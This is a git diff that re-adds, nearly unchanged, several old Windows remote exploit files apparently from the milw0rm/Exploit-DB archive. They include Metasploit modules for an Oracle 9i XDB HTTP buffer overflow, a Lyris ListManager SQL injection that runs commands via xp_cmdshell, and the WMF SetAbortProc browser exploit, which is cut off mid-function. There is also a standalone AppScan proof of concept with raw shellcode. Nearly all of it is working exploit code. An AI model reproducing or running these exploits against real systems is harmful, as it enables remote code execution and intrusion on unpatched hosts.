-	  "GET / HTTP/1.1". "\r\n".
-	  "Host: $target_host:$target_port". "\r\n".
-	  "User-Agent: Mozilla/5.0 (X11; U; Linux i686;".
-	  "en-US; rv:1.7.12) Gecko/20050923". "\r\n".
-	  "Accept: text/xml,application/xml,application".
-	  "/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,".
-	  "image/png,*/*;q=0.5". "\r\n".
-	  "Accept-Language: en-us,en;q=0.5". "\r\n".
-	  "Accept-Encoding: gzip,deflate". "\r\n".
-	  "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7". "\r\n".
-	  "Keep-Alive: 300". "\r\n".
-	  "Connection: keep-alive". "\r\n".
-	  "Authorization: Basic ". Pex::Text::Base64Encode($splat, '').
-	  "\r\n\r\n";
-
-	$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
-
-	my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-		'SSL'       => $self->GetVar('SSL'),
-	  );
-	if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return;
-	}
-
-	$s->Send($sploit);
-	$self->Handler($s);
-	$s->Close();
-	return;
-}
-
-1;
-
-
-# milw0rm.com [2005-12-08]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::oracle9i_xdb_http;
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+
+my $advanced = { };
+
+my $info =
+  {
+
+	'Name'  => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
+	'Version'  => '$Revision: 1.1 $',
+	'Authors' => [ 'y0 [at] w00t-shell.net', ],
+	'Arch'  => [ 'x86' ],
+	'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
+	'Priv'  => 0,
+	'UserOpts'  =>
+	  {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 8080],
+		'SSL'   => [0, 'BOOL', 'Use SSL'],
+	  },
+	  
+	'AutoOpts' => { 'EXITFUNC' => 'thread' },
+	'Payload' =>
+	  {
+		'Space'     => 450,
+		'BadChars'  => "\x00",
+		'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
+		'Keys'      => ['+ws2ord'],
+	  },
+
+	'Description'  => Pex::Text::Freeform(qq{
+		This module exploits a stack overflow in the authorization
+		code of the Oracle 9i HTTP XDB service. David Litchfield, 
+        has illustrated multiple vulnerabilities in the Oracle
+        9i XML Database (XDB), during a seminar on "Variations
+        in exploit methods between Linux and Windows" presented
+        at the Blackhat conference. 
+}),
+
+	'Refs'  =>   [
+		['BID', '8375'],
+		['CVE', '2003-0727'],
+		['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf']
+	  ],
+
+	'DefaultTarget' => 0,
+	'Targets' => [
+
+		['Oracle 9.2.0.1 Universal', 0x60616d46],
+
+	  ],
+
+	'Keys' => ['oracle'],
+
+	'DisclosureDate' => 'Aug 18 2003',
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Check {
+	my ($self) = @_;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+
+	my $s = Msf::Socket::Tcp->new
+	  (
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
+		'SSL'       => $self->GetVar('SSL'),
+	  );
+	if ($s->IsError) {
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return $self->CheckCode('Connect');
+	}
+
+	$s->Send("GET / HTTP/1.0\r\n\r\n");
+	my $res = $s->Recv(-1, 20);
+	$s->Close();
+
+	if ($res !~ /9\.2\.0\.1\.0/) {
+		$self->PrintLine("[*] This server does not appear to be vulnerable.");
+		return $self->CheckCode('Safe');
+	}
+
+	$self->PrintLine("[*] Vulnerable installation detected :-)");
+	return $self->CheckCode('Detected');
+}
+
+sub Exploit
+{
+	my $self = shift;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $offset      = $self->GetVar('OFFSET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $target = $self->Targets->[$target_idx];
+
+	if (! $self->InitNops(128)) {
+		$self->PrintLine("[*] Failed to initialize the nop module.");
+		return;
+	}
+
+	my $splat =
+	  "meta:". Pex::Text::LowerCaseText(442). "\xeb\x64\x42\x42".
+	  pack('V', $target->[1]). "wwwwoooottttsssshhhhllll".
+	  $self->MakeNops(242). "\xeb\x10". $self->MakeNops(109). $shellcode;
+
+	my $sploit =
+	  "GET / HTTP/1.1". "\r\n".
+	  "Host: $target_host:$target_port". "\r\n".
+	  "User-Agent: Mozilla/5.0 (X11; U; Linux i686;".
+	  "en-US; rv:1.7.12) Gecko/20050923". "\r\n".
+	  "Accept: text/xml,application/xml,application".
+	  "/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,".
+	  "image/png,*/*;q=0.5". "\r\n".
+	  "Accept-Language: en-us,en;q=0.5". "\r\n".
+	  "Accept-Encoding: gzip,deflate". "\r\n".
+	  "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7". "\r\n".
+	  "Keep-Alive: 300". "\r\n".
+	  "Connection: keep-alive". "\r\n".
+	  "Authorization: Basic ". Pex::Text::Base64Encode($splat, '').
+	  "\r\n\r\n";
+
+	$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
+
+	my $s = Msf::Socket::Tcp->new
+	  (
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
+		'SSL'       => $self->GetVar('SSL'),
+	  );
+	if ($s->IsError) {
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return;
+	}
+
+	$s->Send($sploit);
+	$self->Handler($s);
+	$s->Close();
+	return;
+}
+
+1;
+
+
+# milw0rm.com [2005-12-08]
diff --git a/platforms/windows/remote/1366.pm b/platforms/windows/remote/1366.pm
index 0d1449822..085c09c9f 100755
--- a/platforms/windows/remote/1366.pm
+++ b/platforms/windows/remote/1366.pm
@@ -1,178 +1,177 @@
-
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::lyris_attachment_mssql;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-
-my $advanced = { };
-
-my $info =
-  {
-	'Name'  => 'Lyris ListManager Attachment SQL Injection (MSSQL)',
-	'Version'  => '$Revision: 1.2 $',
-	'Authors' => [ 'H D Moore ', ],
-	'Arch'  => [ ],
-	'OS'    => [ 'win32' ],
-	'Priv'  => 1,
-	'UserOpts'  =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 80],
-		'SSL'   => [0, 'BOOL', 'Use SSL'],
-	  },
-
-	'Payload' =>
-	  {
-	  	'Space' => 1000,
-		'Keys'  => ['cmd'],
-	  },
-
-	'Description'  => Pex::Text::Freeform(qq{
-		This module exploits a SQL injection flaw in the Lyris ListManager
-	software for Microsoft SQL Server. This flaw allows for arbitrary commands
-	to be executed with administrative privileges by calling the xp_cmdshell
-	stored procedure. Additionally, a window of opportunity is opened during the
-	ListManager for MSDE install process; the 'sa' account is set to the password 'lminstall'
-	for a 5-10 minute period. After the installer finishes, the password is
-	permanently set to 'lyris' followed by the process ID of the installer (a 1-5 digit number).
-}),
-
-	'Refs'  =>
-	  [
-		['URL',   'http://metasploit.com/research/vulns/lyris_listmanager/'],
-		['OSVDB', '21548'],
-	  ],
-	  
-	'DefaultTarget' => 0,
-	'Targets' =>
-	  [
-		['No target needed.'],
-	  ],
-
-	'Keys' => ['lyris'],
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Check {
-	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-
-	my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-		'SSL'       => $self->GetVar('SSL'),
-	  );
-	if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return $self->CheckCode('Connect');
-	}
-
-	$s->Send("GET /read/attachment/' HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n");
-
-	my $r = $s->Recv(-1, 5);
-
-	if ($r =~ /Unclosed quotation mark before/) {
-		$self->PrintLine("[*] Vulnerable installation detected ;)");
-		return $self->CheckCode('Detected');
-	}
-	
-	if ($r =~ /SQL error reported from Lyris/) {
-		$self->PrintLine("[*] Vulnerable installation, but not running MSSQL.");
-		return $self->CheckCode('Safe');
-	}
-	
-	if ($r =~ /ListManagerWeb.*Content-Length: 0/sm) {
-		$self->PrintLine("[*] This system appears to be patched");
-		return $self->CheckCode('Safe');	
-	}
-	
-	$self->PrintLine("[*] Unknown response, patched or invalid target.");
-	return $self->CheckCode('Safe');
-}
-
-sub Exploit {
-	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-
-	my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
-
-	my $sql = 
-		'DECLARE @X NVARCHAR(4000);'.
-		'SET @X= ';
-
-	foreach my $c (unpack('C*', $cmd)) {
-		$sql .= "CHAR($c) + ";
-	}
-	$sql .= "'\x20';";
-	$sql .= 'EXEC MASTER..XP_CMDSHELL @X';
-
-	my $url = "/read/attachment/1;".$self->URLEncode($sql).";--";
-
-
-	my $request =
-	  "GET $url HTTP/1.1\r\n".
-	  "Host: $target_host:$target_port\r\n\r\n";
-
-	my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-		'SSL'       => $self->GetVar('SSL'),
-	  );
-	if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return;
-	}
-
-	$self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
-	$s->Send($request);
-
-	$self->PrintLine("[*] Waiting for a response...");
-	$s->Recv(-1, 10);
-	$self->Handler($s);
-	$s->Close();
-	return;
-}
-
-sub URLEncode {
-	my $self = shift;
-	my $data = shift;
-	my $res;
-
-	foreach my $c (unpack('C*', $data)) {
-		if (
-			($c >= 0x30 && $c <= 0x39) ||
-			($c >= 0x41 && $c <= 0x5A) ||
-			($c >= 0x61 && $c <= 0x7A)
-		  ) {
-			$res .= chr($c);
-		} else {
-			$res .= sprintf("%%%.2x", $c);
-		}
-	}
-	return $res;
-}
-
-1;
-
-
-# milw0rm.com [2005-12-09]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::lyris_attachment_mssql;
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+
+my $advanced = { };
+
+my $info =
+  {
+	'Name'  => 'Lyris ListManager Attachment SQL Injection (MSSQL)',
+	'Version'  => '$Revision: 1.2 $',
+	'Authors' => [ 'H D Moore ', ],
+	'Arch'  => [ ],
+	'OS'    => [ 'win32' ],
+	'Priv'  => 1,
+	'UserOpts'  =>
+	  {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 80],
+		'SSL'   => [0, 'BOOL', 'Use SSL'],
+	  },
+
+	'Payload' =>
+	  {
+	  	'Space' => 1000,
+		'Keys'  => ['cmd'],
+	  },
+
+	'Description'  => Pex::Text::Freeform(qq{
+		This module exploits a SQL injection flaw in the Lyris ListManager
+	software for Microsoft SQL Server. This flaw allows for arbitrary commands
+	to be executed with administrative privileges by calling the xp_cmdshell
+	stored procedure. Additionally, a window of opportunity is opened during the
+	ListManager for MSDE install process; the 'sa' account is set to the password 'lminstall'
+	for a 5-10 minute period. After the installer finishes, the password is
+	permanently set to 'lyris' followed by the process ID of the installer (a 1-5 digit number).
+}),
+
+	'Refs'  =>
+	  [
+		['URL',   'http://metasploit.com/research/vulns/lyris_listmanager/'],
+		['OSVDB', '21548'],
+	  ],
+	  
+	'DefaultTarget' => 0,
+	'Targets' =>
+	  [
+		['No target needed.'],
+	  ],
+
+	'Keys' => ['lyris'],
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Check {
+	my $self = shift;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+
+	my $s = Msf::Socket::Tcp->new
+	  (
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
+		'SSL'       => $self->GetVar('SSL'),
+	  );
+	if ($s->IsError) {
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return $self->CheckCode('Connect');
+	}
+
+	$s->Send("GET /read/attachment/' HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n");
+
+	my $r = $s->Recv(-1, 5);
+
+	if ($r =~ /Unclosed quotation mark before/) {
+		$self->PrintLine("[*] Vulnerable installation detected ;)");
+		return $self->CheckCode('Detected');
+	}
+	
+	if ($r =~ /SQL error reported from Lyris/) {
+		$self->PrintLine("[*] Vulnerable installation, but not running MSSQL.");
+		return $self->CheckCode('Safe');
+	}
+	
+	if ($r =~ /ListManagerWeb.*Content-Length: 0/sm) {
+		$self->PrintLine("[*] This system appears to be patched");
+		return $self->CheckCode('Safe');	
+	}
+	
+	$self->PrintLine("[*] Unknown response, patched or invalid target.");
+	return $self->CheckCode('Safe');
+}
+
+sub Exploit {
+	my $self = shift;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+
+	my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
+
+	my $sql = 
+		'DECLARE @X NVARCHAR(4000);'.
+		'SET @X= ';
+
+	foreach my $c (unpack('C*', $cmd)) {
+		$sql .= "CHAR($c) + ";
+	}
+	$sql .= "'\x20';";
+	$sql .= 'EXEC MASTER..XP_CMDSHELL @X';
+
+	my $url = "/read/attachment/1;".$self->URLEncode($sql).";--";
+
+
+	my $request =
+	  "GET $url HTTP/1.1\r\n".
+	  "Host: $target_host:$target_port\r\n\r\n";
+
+	my $s = Msf::Socket::Tcp->new
+	  (
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
+		'SSL'       => $self->GetVar('SSL'),
+	  );
+	if ($s->IsError) {
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return;
+	}
+
+	$self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
+	$s->Send($request);
+
+	$self->PrintLine("[*] Waiting for a response...");
+	$s->Recv(-1, 10);
+	$self->Handler($s);
+	$s->Close();
+	return;
+}
+
+sub URLEncode {
+	my $self = shift;
+	my $data = shift;
+	my $res;
+
+	foreach my $c (unpack('C*', $data)) {
+		if (
+			($c >= 0x30 && $c <= 0x39) ||
+			($c >= 0x41 && $c <= 0x5A) ||
+			($c >= 0x61 && $c <= 0x7A)
+		  ) {
+			$res .= chr($c);
+		} else {
+			$res .= sprintf("%%%.2x", $c);
+		}
+	}
+	return $res;
+}
+
+1;
+
+
+# milw0rm.com [2005-12-09]
diff --git a/platforms/windows/remote/1374.pl b/platforms/windows/remote/1374.pl
index 46330c376..029a73d71 100755
--- a/platforms/windows/remote/1374.pl
+++ b/platforms/windows/remote/1374.pl
@@ -1,58 +1,58 @@
-# Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC
-# 
-# How to use:
-#	1. Run this script to setup the fake web server.
-#	2. Scan the server with AppScan QA, either in Interactive or Manual mode.
-#	3. If you get an "You are vulnerable!" popup, you should upgrade inmediatly.
-#
-#	PoC developed for Windows 2000 Server SP4.
-#
-
-#!/usr/bin/perl -w
-
-use IO::Socket::INET;
-
-# Dissable buffering
-$| = 1;
-
-# Define 200 OK Responses
-my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=ISO-8859-1\r\n\r\nadmin";
-
-# Define the 401 Auth Required Header and Tail
-my $res401Head = "HTTP/1.1 401 Authorization Required\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:43:53 GMT\r\nServer: Apache\r\nWWW-Authenticate: Basic realm=\"";
-
-my $res401Tail = "Content-Length: 401\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n401 Authorization Required\r\n\r\n
    Authorization Required
    \r\n
    This server could not verify that you\r\nare authorized to access the document\r\nrequested.  Either you supplied the wrong\r\ncredentials (e.g., bad password), or your\r\nbrowser doesn't understand how to supply\r\nthe credentials required.
    \r\n";
-
-# Ret - call ebx - in user32.dll (Windows 2000 Server SP4)
-my $ret = pack("l", 0x77e11627);
-
-my $scode = "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb\x21\x02\x59\x7c\x51\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xab\x0c\x59\x7c\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x13\x52\x51\x51\x52\xff\xd0\x31\xd2\x52\xb8\xbe\x69\x59\x7c\xff\xd0\xe8\xc6\xff\xff\xff\x75\x73\x65\x72\x33\x32\x4e\xe8\xc8\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc8\xff\xff\xff\x59\x6f\x75\x20\x61\x72\x65\x20\x76\x75\x6c\x6e\x65\x72\x61\x62\x6c\x65\x21\x4e";
-
-my $resExploit = $res401Head . "\x41"x347 . "\xeb\x06AA". $ret . $scode . "\"\r\n" . $res401Tail;
-
-# Initialization of Fake WebServer
-my $srv = IO::Socket::INET->new(LocalPort => 80,
-			      	Reuse => 1, 
-				Listen => 1 ) || die "Could not create socket: $!\n";
-
-print "Waiting for connections...\n";
-							
-while ($cli = $srv->accept()) {
-	printf "Request from %s\n", $cli->peerhost;	
-	while (<$cli>) {
-		if (s/(admin)/$1/) {
-			# If Request is for "admin", launch the exploit 
-			printf "Request for protected resource detected...launching exploit\n";		
-			print $cli $resExploit;
-		}
-		else {
-			# Else send a normal response 
-			print $cli $res200;	
-		}
-	}
-	close($cli);
-}
-close($srv);
-
-
-# milw0rm.com [2005-12-15]
+# Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC
+# 
+# How to use:
+#	1. Run this script to setup the fake web server.
+#	2. Scan the server with AppScan QA, either in Interactive or Manual mode.
+#	3. If you get an "You are vulnerable!" popup, you should upgrade inmediatly.
+#
+#	PoC developed for Windows 2000 Server SP4.
+#
+
+#!/usr/bin/perl -w
+
+use IO::Socket::INET;
+
+# Dissable buffering
+$| = 1;
+
+# Define 200 OK Responses
+my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=ISO-8859-1\r\n\r\nadmin";
+
+# Define the 401 Auth Required Header and Tail
+my $res401Head = "HTTP/1.1 401 Authorization Required\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:43:53 GMT\r\nServer: Apache\r\nWWW-Authenticate: Basic realm=\"";
+
+my $res401Tail = "Content-Length: 401\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n401 Authorization Required\r\n\r\n
    Authorization Required
    \r\n
    This server could not verify that you\r\nare authorized to access the document\r\nrequested.  Either you supplied the wrong\r\ncredentials (e.g., bad password), or your\r\nbrowser doesn't understand how to supply\r\nthe credentials required.
    \r\n";
+
+# Ret - call ebx - in user32.dll (Windows 2000 Server SP4)
+my $ret = pack("l", 0x77e11627);
+
+my $scode = "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb\x21\x02\x59\x7c\x51\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xab\x0c\x59\x7c\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x13\x52\x51\x51\x52\xff\xd0\x31\xd2\x52\xb8\xbe\x69\x59\x7c\xff\xd0\xe8\xc6\xff\xff\xff\x75\x73\x65\x72\x33\x32\x4e\xe8\xc8\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc8\xff\xff\xff\x59\x6f\x75\x20\x61\x72\x65\x20\x76\x75\x6c\x6e\x65\x72\x61\x62\x6c\x65\x21\x4e";
+
+my $resExploit = $res401Head . "\x41"x347 . "\xeb\x06AA". $ret . $scode . "\"\r\n" . $res401Tail;
+
+# Initialization of Fake WebServer
+my $srv = IO::Socket::INET->new(LocalPort => 80,
+			      	Reuse => 1, 
+				Listen => 1 ) || die "Could not create socket: $!\n";
+
+print "Waiting for connections...\n";
+							
+while ($cli = $srv->accept()) {
+	printf "Request from %s\n", $cli->peerhost;	
+	while (<$cli>) {
+		if (s/(admin)/$1/) {
+			# If Request is for "admin", launch the exploit 
+			printf "Request for protected resource detected...launching exploit\n";		
+			print $cli $resExploit;
+		}
+		else {
+			# Else send a normal response 
+			print $cli $res200;	
+		}
+	}
+	close($cli);
+}
+close($srv);
+
+
+# milw0rm.com [2005-12-15]
diff --git a/platforms/windows/remote/1391.pm b/platforms/windows/remote/1391.pm
index 8e493b9d2..f6a47f663 100755
--- a/platforms/windows/remote/1391.pm
+++ b/platforms/windows/remote/1391.pm
@@ -1,349 +1,348 @@
-
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::ie_xp_pfv_metafile;
-
-use strict;
-use base "Msf::Exploit";
-use Pex::Text;
-use IO::Socket::INET;
-
-my $advanced =
-  {
-  };
-
-my $info =
-  {
-	'Name'           => 'Windows XP/2003 Metafile Escape() SetAbortProc Code Execution',
-	'Version'        => '$Revision: 1.8 $',
-	'Authors'        =>
-	  [
-		'H D Moore ',
-		'O600KO78RUS[at]unknown.ru'
-	  ],
-
-	'Description'    =>
-	  Pex::Text::Freeform(qq{
-			This module exploits a vulnerability in the GDI library included with
-			Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
-			to execute arbitrary code through the SetAbortProc procedure. This module
-			generates a random WMF record stream for each request.
-}),
-
-	'Arch'           => [ 'x86' ],
-	'OS'             => [ 'win32', 'winxp', 'win2003' ],
-	'Priv'           => 0,
-
-	'UserOpts'       =>
-	  {
-		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
-		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
-	  },
-
-	'Payload'        =>
-	  {
-		'Space'    => 1000 + int(rand(256)) * 4,
-		'BadChars' => "\x00",
-		'Keys'     => ['-bind'],
-	  },
-	'Refs'           =>
-	  [
-	  	['BID', '16074'],
-		['CVE', '2005-4560'],
-	  	['OSVDB', '21987'],
-		['MIL', '111'],	
-		['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
-		['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
-	  ],
-
-	'DefaultTarget'  => 0,
-	'Targets'        =>
-	  [
-		[ 'Automatic - Windows XP / Windows 2003' ]
-	  ],
-	
-	'Keys'           => [ 'wmf' ],
-
-	'DisclosureDate' => 'Dec 27 2005',
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Exploit
-{
-	my $self = shift;
-	my $server = IO::Socket::INET->new(
-		LocalHost => $self->GetVar('HTTPHOST'),
-		LocalPort => $self->GetVar('HTTPPORT'),
-		ReuseAddr => 1,
-		Listen    => 1,
-		Proto     => 'tcp'
-	);
-	my $client;
-
-	# Did the listener create fail?
-	if (not defined($server)) {
-		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
-		return;
-	}
-	
-	my $httphost = $self->GetVar('HTTPHOST');
-	if ($httphost eq '0.0.0.0') {
-		$httphost = Pex::Utils::SourceIP('1.2.3.4');
-	}
-
-	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
-
-	while (defined($client = $server->accept())) {
-		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
-	}
-
-	return;
-}
-
-sub HandleHttpClient
-{
-	my $self = shift;
-	my $fd   = shift;
-
-	# Set the remote host information
-	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
-		
-
-	# Read the HTTP command
-	my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);
-
- 	
-	if ($url !~ /\.wmf/i) {
-		$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting...");
-		
-		# XXX This could be replaced by obfuscated javascript too...
-		
-		# Transmit the HTTP redirect response
-		$fd->Send(
-			"HTTP/1.0 302 Moved\r\n" .
-			"Location: /". Pex::Text::AlphaNumText(int(rand(1024)+1))  .".wmf\r\n" .
-			"Content-Type: text/html\r\n" .
-			"Content-Length: 0\r\n" .
-			"Connection: close\r\n" .
-			"\r\n"
-		  );
-
-		$fd->Close();
-		
-		return;		
-	}
-	
-	my $shellcode = $self->GetVar('EncodedPayload')->Payload;
-
-	# Push our minimum length just over the ethernet MTU
-	my $pre_mlen = 1440 + rand(8192);
-	my $suf_mlen = rand(8192)+128;
-	
-	# The number of random objects we generated
-	my $fill = 0;
-	
-	# The buffer of random bogus objects
-	my $pre_buff = "";
-	my $suf_buff = "";
-
-	while (length($pre_buff) < $pre_mlen && $fill < 65535) {
-		$pre_buff .= RandomWMFRecord();
-		$fill += 1;
-	}
-
-	while (length($suf_buff) < $suf_mlen && $fill < 65535) {
-		$suf_buff .= RandomWMFRecord();
-		$fill += 1;
-	}
-
-	my $clen = 18 + 8 + 6 + length($shellcode) + length($pre_buff) + length($suf_buff);
-	my $content =
-		#
-		# WindowsMetaHeader
-		#
-		pack('vvvVvVv',
-				# WORD  FileType;       /* Type of metafile (0=memory, 1=disk, 2=fjear) */
-				2,
-				# WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
-				9,
-				# WORD  Version;        /* Version of Microsoft Windows used */
-				0x0300,
-				# DWORD FileSize;       /* Total size of the metafile in WORDs */
-				$clen/2,
-				# WORD  NumOfObjects;   /* Number of objects in the file */
-				$fill+1,
-				# DWORD MaxRecordSize;  /* The size of largest record in WORDs */
-				int(rand(64)+8),
-				# WORD  NumOfParams;    /* Not Used (always 0) */
-				0
-		).
-		#
-		# Filler data
-		#
-		$pre_buff.
-		#
-		# StandardMetaRecord - Escape()
-		#
-		pack('Vvv',
-			# DWORD Size;          /* Total size of the record in WORDs */
-			4,
-			# WORD  Function;      /* Function number (defined in WINDOWS.H) */
-			0x0026,                # Can also be 0xff26, 0x0626, etc...
-			# WORD  Parameters[];  /* Parameter values passed to function */
-			9,
-		). $shellcode .
-		#
-		# Filler data
-		#
-		$suf_buff.
-		#
-		# Complete the structure
-		#
-		pack('Vv',
-			3,
-			0
-		);
-
-	
-	$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");
-
-
-	# Transmit the HTTP response
-	my $req = 		
-		"HTTP/1.0 200 OK\r\n" .
-		"Content-Type: text/plain\r\n" .
-		"Content-Length: " . length($content) . "\r\n" .
-		"Connection: close\r\n" .
-		"\r\n" .
-		$content;
-		
-		
-	my $res = $fd->Send($req);
-
-	# Prevents IE from throwing an error in some cases
-	select(undef, undef, undef, 0.1);
-	
-	$fd->Close();
-	
-	# The Content-Disposition trick was not very reliable (2003 ignores it)
-	#    "Content-Disposition: inline; filename=". Pex::Text::AlphaNumText(int(rand(1024)+1)) .".jpg\r\n".
-}
-
-
-sub RandomWMFRecord {
-	my $type = int(rand(3));
-
-	if ($type == 0)	{
-		# CreatePenIndirect
-		return pack('Vv',
-			8,
-			0x02FA
-		). Pex::Text::RandomData(10)
-	}
-	elsif ( $type == 1 ) {
-		# CreateBrushIndirect
-		return pack('Vv',
-			7,
-			0x02FC
-		). Pex::Text::RandomData(8)
-	}
-	else {
-		# Rectangle
-		return pack('Vv',
-			7,
